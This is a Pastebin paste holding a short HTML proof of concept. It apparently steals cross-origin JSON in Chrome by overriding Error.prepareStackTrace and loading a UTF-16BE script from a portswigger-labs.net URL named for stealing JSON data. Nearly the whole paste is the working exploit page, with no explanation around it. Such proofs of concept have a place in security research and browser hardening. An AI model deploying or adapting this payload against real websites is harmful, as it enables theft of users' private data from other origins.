Advertisement
Guest User

Untitled

a guest
Jul 17th, 2019
97
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.40 KB | None | 0 0
  1. <!doctype HTML>
  2. <meta charset="UTF-8" />
  3. <script>
  4. Error.prepareStackTrace = function(error,stacks)
  5. {
  6. alert(error);
  7. stacks[0].getThis().alert(stacks[0].getThis().location);
  8. return "MyStackObject";
  9. }
  10. </script>
  11. <script charset="UTF-16BE" src="http://subdomain1.portswigger-labs.net/utf-16be/chrome_steal_json_data_with_proxy/array.php"></script>
  12. <body>
  13. <h1> open the developer console </h1>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement